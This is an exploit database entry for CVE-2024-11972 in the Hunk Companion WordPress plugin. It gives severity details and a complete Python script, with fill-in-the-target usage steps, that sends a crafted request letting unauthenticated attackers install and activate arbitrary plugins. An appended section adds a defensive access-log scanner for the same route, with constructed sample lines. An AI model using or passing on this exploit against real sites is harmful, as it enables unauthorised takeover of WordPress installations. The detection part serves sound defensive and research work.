Hunk Companion Plugin 1.9.0 – Unauthenticated Plugin Installation

Exploit Details

Basic Information

Exploit Title: Hunk Companion Plugin 1.9.0 – Unauthenticated Plugin Installation
Exploit ID: EDB-ID:52259
Type: exploitdb
Published: 2025-04-18T00:00:00
Modified: 2025-04-18T00:00:00

CVSS Information

CVSS Score: 9.8
Severity: CRITICAL
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE Information

  • CVE-2024-11972

Exploit Description

Exploit Title: Hunk Companion Plugin 1.9.0 – Unauthenticated Plugin Installation Date: 16 December, 2024 Exploit Author: Jun Takemura Author's GitHub: https://github.com/JunTakemura Author's Blog: juntakemura.dev Vendor…

Exploit Code

# Exploit Title: Hunk Companion Plugin 1.9.0 – Unauthenticated Plugin Installation
# Date: 16 December, 2024
# Exploit Author: Jun Takemura
# Author's GitHub: https://github.com/JunTakemura
# Author's Blog: juntakemura.dev
# Vendor Homepage: https://themehunk.com
# Software Link: https://wordpress.org/plugins/hunk-companion/
# Version: Tested on Hunk Companion 1.8.8
# CVE: CVE-2024-11972
# Vulnerability Description:
# Exploits a flaw in the Hunk Companion plugin's permission_callback for the
# /wp-json/hc/v1/themehunk-import endpoint, allowing unauthenticated attackers
# to install and activate arbitrary plugins from the WordPress.org repository.
# Tested on: Ubuntu
# Original vulnerability discovered by: Daniel Rodriguez
#
# Usage:
# 1. Update `target_url` below with the target WordPress site's URL.
# 2. Update `plugin_name` with the slug of the plugin you want to install.
# 3. Run: python3 exploit.py
#

import requests

# Update 'URL' with your target WordPress site URL, for example "http://localhost/wordpress"
target_url = "URL"

# Update 'NAME' with desired plugin's name (slug), for example "wp-query-console"
plugin_name = "NAME"

endpoint = "/wp-json/hc/v1/themehunk-import"
# Plain string concatenation rather than urljoin(): urljoin() with an absolute path
# would drop a sub-directory such as "/wordpress" from the site URL.
url = target_url.rstrip("/") + endpoint

payload = {
    "params": {
        "plugin": {
            plugin_name: "Plugin Label"
        },
        "allPlugins": [
            {
                plugin_name: f"{plugin_name}/{plugin_name}.php"
            }
        ],
        "themeSlug": "theme",
        "proThemePlugin": "plugin",
        "templateType": "free",
        "tmplFreePro": "theme",
        "wpUrl": target_url
    }
}

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64)",
    "Content-Type": "application/json"
}

try:
    response = requests.post(url, json=payload, headers=headers, timeout=10)
    response.raise_for_status()  # Raises an HTTPError if the response is not 2xx
    print("[+] Exploit sent successfully.")
    print(f"Response Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")
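From the defender's side, the request above leaves a recognisable trace in the web server access log: a POST to the hc/v1/themehunk-import route, answered with 2xx on an unpatched site and 401/403 once the permission check is fixed. The following scanner is an added example, not part of the exploit or the plugin; it parses combined-format log lines (constructed sample lines, not real traffic) and flags hits on the route in both URL forms WordPress serves, the pretty /wp-json/ path and the /index.php?rest_route= fallback.

```python
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs

# REST route named in the advisory above, used here only as a string to match against.
ROUTE = "/hc/v1/themehunk-import"

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

def route_of(target: str) -> Optional[str]:
    """REST route a request targets, covering both URL forms WordPress serves."""
    parts = urlsplit(target)
    path = parts.path.rstrip("/")
    if path.startswith("/wp-json/"):
        return path[len("/wp-json"):]
    # Plain permalinks: /index.php?rest_route=/hc/v1/...
    if path.endswith("/index.php"):
        qs = parse_qs(parts.query).get("rest_route")
        if qs:
            return qs[0].rstrip("/")
    return None

def scan(lines):
    """Flag POSTs to the import route; a 2xx status means the import handler ran."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m["method"] != "POST" or route_of(m["target"]) != ROUTE:
            continue
        status = int(m["status"])
        findings.append({
            "ip": m["ip"], "time": m["time"], "status": status, "ua": m["ua"],
            "outcome": "handler_ran" if 200 <= status < 300 else "rejected",
        })
    return findings

# Constructed sample lines (not real traffic): a page view, a successful import call,
# the same call via the rest_route fallback, and a call rejected as a patched site would.
SAMPLE_LOG = [
    '203.0.113.10 - - [18/Apr/2025:10:00:01 +0000] "GET / HTTP/1.1" 200 4821 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [18/Apr/2025:10:00:02 +0000] "POST /wp-json/hc/v1/themehunk-import HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64)"',
    '198.51.100.7 - - [18/Apr/2025:10:05:44 +0000] "POST /index.php?rest_route=/hc/v1/themehunk-import HTTP/1.1" 200 512 "-" "curl/8.5.0"',
    '198.51.100.7 - - [18/Apr/2025:11:00:00 +0000] "POST /wp-json/hc/v1/themehunk-import/ HTTP/1.1" 401 96 "-" "curl/8.5.0"',
]
```

Any "handler_ran" finding on a site that has not updated past the affected versions warrants checking the installed-plugins list for additions the administrators did not make.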
